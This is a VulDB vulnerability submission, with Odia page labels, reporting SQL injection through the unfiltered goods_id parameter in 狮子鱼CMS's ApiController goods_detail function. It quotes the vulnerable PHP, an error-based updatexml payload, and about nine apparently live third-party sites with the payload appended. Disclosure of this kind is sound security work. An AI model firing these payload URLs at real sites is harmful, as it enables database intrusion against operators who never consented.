ଜମା କରନ୍ତୁ #96988: 狮子鱼CMS goods_id parameters are not strictly filtered, resulting in SQL injection vulnerabilitiesସୂଚନା

ଶୀର୍ଷକ	狮子鱼CMS goods_id parameters are not strictly filtered, resulting in SQL injection vulnerabilities
ବର୍ଣ୍ଣନା	The source code file for the pure vulnerability is .class.php by ApiController The vulnerable file is ApiController.class.php and the key location is : public function goods_detail() { $goods_id = I('get.goods_id'); //gallery =>img_url //goods goods.goods_desc goods_name group_price market_price sell_count group_number $sql="select g.*,gd.description,gd.summary,gd.tag from ". C('DB_PREFIX')."goods g,".C('DB_PREFIX')."goods_description gd where g.goods_id=gd.goods_id and g.goods_id=".$goods_id; $goods_arr=M()->query($sql); $qian=array("\r\n"); $hou=array("<br/>"); $goods_arr[0]['summary'] = str_replace($qian,$hou,$goods_arr[0]['summary']); $sql="select image from ".C('DB_PREFIX')."goods_image where goods_id=".$goods_id; $goods_image=M()->query($sql); $gallery = array(); $default_image = ''; foreach($goods_image as $val) { $val['img_url'] = str_replace('http','https',C('SITE_URL')).'/Uploads/ http://peiqi-wiki-poc.oss-cn-beijing.aliyuncs.com/vuln/'.$val['image']; if(empty($default_image)) { $default_image = str_replace('http','https',C('SITE_URL')).resize($val['image'], C('goods_thumb_width'), C('goods_thumb_height')); } $gallery[] = array('img_url' => $val['img_url']); } $goods = $goods_arr[0]; The payload for the vulnerability test is: xxx/index.php?s=api/goods_detail&goods_id=1 and updatexml(0,concat(0x7e,(database())),0) Purely in the vulnerability URL is (example): https://zl.diguan888.com/index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,database(),0x7e),1), https://lijiejietest.sipokeyes.vip520.net/index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,database(),0x7e),1), https://bd.66tg.top/index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,database(),0x7e),1), https://chuangke.bangbendi.com//index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,database(),0x7e),1), https://ziyang.langlaoda.cn/index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,database(),0x7e),1), https://ankangshi.langlaoda.cn/index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,database(),0x7e),1), https://weinanheyangxian.langlaoda.cn//index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,database(),0x7e),1), http://langlaoda.cn//index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,database(),0x7e),1), https://qy.bwsoftware.cn/index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,database(),0x7e),1)， Vulnerability description: Poor filtering of goods_id parameters in狮子鱼 CMS ApiController .class.php files leads to SQL injection vulnerability By inserting SQL commands into web forms or entering query strings for domain names or page requests, the server is finally tricked into executing malicious SQL commands to obtain data in the database
ଉପଭୋକ୍ତା	S7iter (UID 42133)
ଦାଖଲ	03/02/2023 01:01 PM (3 ବର୍ଷ ବର୍ଷ ago)
ମଧ୍ୟମ ଧରଣର	03/02/2023 07:22 PM (6 hours later)
ସ୍ଥିତି	ଗ୍ରହଣ କରାଯାଇଛି
VulDB ଏଣ୍ଟ୍ରି	222223 [狮子鱼CMS ApiController.class.php goods_detail goods_id SQL ଇଞ୍ଜେକ୍ସନ]
ପଏଣ୍ଟ	17

◂ ପଛକୁ ସମୀକ୍ଷା ଆହୁରି ଦୂରରେ ▸

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!